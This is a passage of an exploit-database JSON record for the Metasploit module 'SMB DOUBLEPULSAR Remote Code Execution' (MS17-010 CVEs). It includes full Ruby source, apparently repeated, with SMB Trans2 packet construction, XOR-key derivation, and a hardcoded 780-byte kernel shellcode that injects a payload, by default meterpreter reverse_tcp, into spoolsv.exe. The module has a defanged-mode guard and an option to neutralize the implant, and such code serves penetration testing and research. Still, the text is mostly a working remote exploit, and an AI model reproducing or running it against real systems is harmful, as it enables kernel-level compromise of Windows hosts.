simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:21:04", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "3334c16badce24728525e6dcbd0b7537", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-05T02:14:49", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", 
"1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T02:14:49", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-05T02:14:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
